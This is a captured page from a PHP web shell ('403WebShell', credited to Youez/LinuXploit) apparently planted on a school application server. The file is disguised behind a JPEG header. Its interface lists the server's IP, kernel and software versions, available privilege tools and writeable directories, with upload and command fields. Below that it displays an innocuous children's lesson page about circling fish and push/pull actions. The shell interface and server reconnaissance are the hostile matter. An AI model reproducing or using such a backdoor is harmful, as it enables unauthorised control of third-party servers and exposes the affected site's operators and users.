????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.224.2.133
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old2/Html/LevelB/Category1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old2/Html/LevelB/Category1/LevelBCat1Lesson10.html
<!DOCTYPE html>
<html>
    <head>
        <title>Circle fish, push and pull.</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
            
            <style type="text/css">
                
                .textFont
                {
                    padding-left: 10px;
                    font-size: 24px;
                    font-family: "Arial Rounded MT Bold";
                    font-style: italic;
                    color: #000;
                }
            
                .textColourRed
                {
                    color: red;
                }
                
                .textColourBlue
                {
                    color: blue;
                }
            
                svg
                {
                    position: absolute;
                    background-color: transparent;
                }
            
                </style>
            
            <script>
                
                function page_preLoad()
                {
					setPageImages();
                    
                    shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.B, Category.No1, 10), true, true);
                    shared_setFooterTable('id_tblFooter', true, true, true, true, true);
                }
            
                function page_onLoad()
                {
                    shared_set_debugInfo(Level.B, Category.No1);
                    
                    shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                    
                    setAllSvgsWidthHeightAndPositionFromTds();
                    
                    setAllEllipseStyles();
                }
            
                function setPageImages()
                {
                    var imagesPath = '../../../img/LevelB/Category1/LevelBCat1Lesson10/';
                    
                    shared_setImageSource('id_imgFishInPot1', imagesPath, 'fishInPot.png');
                    shared_setImageSource('id_imgFishInPot2', imagesPath, 'fishInPot.png');
                    shared_setImageSource('id_imgActionPush1', imagesPath, 'actionPush.png');
                    shared_setImageSource('id_imgActionPull1', imagesPath, 'actionPull.png');
                    shared_setImageSource('id_imgActionPush2', imagesPath, 'actionPush.png');
                    shared_setImageSource('id_imgActionPull2', imagesPath, 'actionPull.png');
                }
                
                function setAllSvgsWidthHeightAndPositionFromTds()
                {
                    var nTds = 6;
                    
                    for (var nthTd = 1; nthTd <= nTds; nthTd++)
                    {
                        shared_svg_setSvgWidthHeightAndPositionFromTd('id_td' + nthTd, 'id_svg' + nthTd);
                    }
                }
                
                function setAllEllipseStyles()
                {
                    var allEllipseIdsArray = getAllEllipseIdsArray();
                    
                    for (var indexEllipse = 0; indexEllipse < allEllipseIdsArray.length; indexEllipse++)
                    {
                        var id_ellipse = allEllipseIdsArray[indexEllipse];
                        
                        shared_svg_setEllipseStyle(id_ellipse);
                    }
                }
                
                function getAllEllipseIdsArray()
                {
                    var allEllipseIdsArray = new Array();
                    
                    for (var nthEllipse = 1; nthEllipse <= 8; nthEllipse++)
                    {
                        allEllipseIdsArray.push('id_ellipse' + nthEllipse );
                    }
                    
                    return (allEllipseIdsArray);
                }
                
                function ellipse_click(id_ellipse)
                {
                    var group1IdsArray = ['id_ellipse1', 'id_ellipse2'];
                    var group2IdsArray = ['id_ellipse3', 'id_ellipse4'];
                    var group3IdsArray = ['id_ellipse5', 'id_ellipse6'];
                    var group4IdsArray = ['id_ellipse7', 'id_ellipse8'];
                    
                    var allGroupsIdsArrayArray = [group1IdsArray, group2IdsArray, group3IdsArray, group4IdsArray];
                    
                    shared_svg_showHideEllipsesMultipleFor1Td(id_ellipse, allGroupsIdsArrayArray);
                }
                
                function btnValidate_click()
                {
                    var allEllipseIdsArray = getAllEllipseIdsArray();
                    
                    var correctEllipseIdsArray = ['id_ellipse1', 'id_ellipse4', 'id_ellipse5', 'id_ellipse8'];
                    
                    var nCorrectEllipses = shared_svg_validateEllipses(allEllipseIdsArray, correctEllipseIdsArray);
                    
                    if (nCorrectEllipses == 4)
                    {
                        shared_show_claps_animation('shared_id_div_claps_image');
                    }
                }
                
                function btnPrevious_click()
                {
                    window.location = 'LevelBCat1Lesson9.html';
                }
                
                function btnNext_click()
                {
                    window.location = 'LevelBCat1Lesson11.html';
                }
                
                function btnHome_click()
                {
                    shared_btnHomeCategories_click('LevelB');
                }
        </script>
    </head>
    
    <body onLoad="page_onLoad()">
        <div id="shared_id_div_claps_image">
        </div>
        
        <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
            <tr height="5%">
                <td>
                    <header height="100%">
                        <div id="id_tblHeader" align="center"></div>
                    </header>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                        <tr>
                            <td>
                                <table width="100%" height="100%" border="0px" cellspacing="0" cellpadding="5">
                                    <tr height="25%">
                                        <td align="center" style="padding-bottom: 0px">
                                            <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                <tr height="20%">
                                                    <td class="textFont" style="border-bottom:none">Circle the <span class="textColourRed">fish</span> which is <span class="textColourBlue">in </span>the pot.</td>
                                                </tr>
                                                <tr height="*">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td width="33%">&nbsp;</td>
                                                                <td id="id_td1" width="*" style="text-align:center">
                                                                    <img id="id_imgFishInPot1">
                                                                    <svg id="id_svg1" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse1" cx="47%" cy="59%" rx="13%" ry="17%"/>
                                                                        <ellipse id="id_ellipse2" cx="57%" cy="31%" rx="10%" ry="15%"/>
                                                                    </svg>
                                                                </td>
                                                                <td width="33%">&nbsp;</td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="25%">
                                        <td align="center" style="padding-bottom: 0px">
                                            <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                <tr height="20%">
                                                    <td class="textFont" style="border-bottom:none">Circle the <span class="textColourRed">fish</span> which is <span class="textColourBlue">out </span>of the pot.</td>
                                                </tr>
                                                <tr height="*">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td width="33%">&nbsp;</td>
                                                                <td id="id_td2" width="*" style="text-align:center">
                                                                    <img id="id_imgFishInPot2">
                                                                    <svg id="id_svg2" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse3" cx="47%" cy="59%" rx="13%" ry="17%"/>
                                                                        <ellipse id="id_ellipse4" cx="57%" cy="31%" rx="10%" ry="15%"/>
                                                                    </svg>
                                                                </td>
                                                                <td width="33%">&nbsp;</td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="25%">
                                        <td align="center" style="padding-bottom: 0px">
                                            <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                <tr height="20%">
                                                    <td class="textFont" style="border-bottom:none">Circle the action <span class="textColourRed">push</span>.
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td3" width="50%" style="text-align:center">
                                                                    <img id="id_imgActionPush1">
                                                                    <svg id="id_svg3" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse5" cx="50%" cy="50%" rx="20%" ry="45%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td4" width="*" style="text-align:center">
                                                                    <img id="id_imgActionPull1">
                                                                    <svg id="id_svg4" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse6" cx="50%" cy="50%" rx="20%" ry="45%"/>
                                                                    </svg>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="*">
                                        <td align="center">
                                            <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                <tr height="20%">
                                                    <td class="textFont" style="border-bottom:none">Circle the action <span class="textColourRed">pull</span>.
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td5" width="50%" style="text-align:center">
                                                                    <img id="id_imgActionPush2">
                                                                    <svg id="id_svg5" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse7" cx="50%" cy="50%" rx="20%" ry="45%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td6" width="*" style="text-align:center">
                                                                    <img id="id_imgActionPull2">
                                                                    <svg id="id_svg6" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse8" cx="50%" cy="50%" rx="20%" ry="45%"/>
                                                                    </svg>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="5%">
                <td>
                    <footer height="100%">
                        <div id="id_tblFooter" align="center"></div>
                    </footer>
                </td>
            </tr>
        </table>
        <script>
            page_preLoad();
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit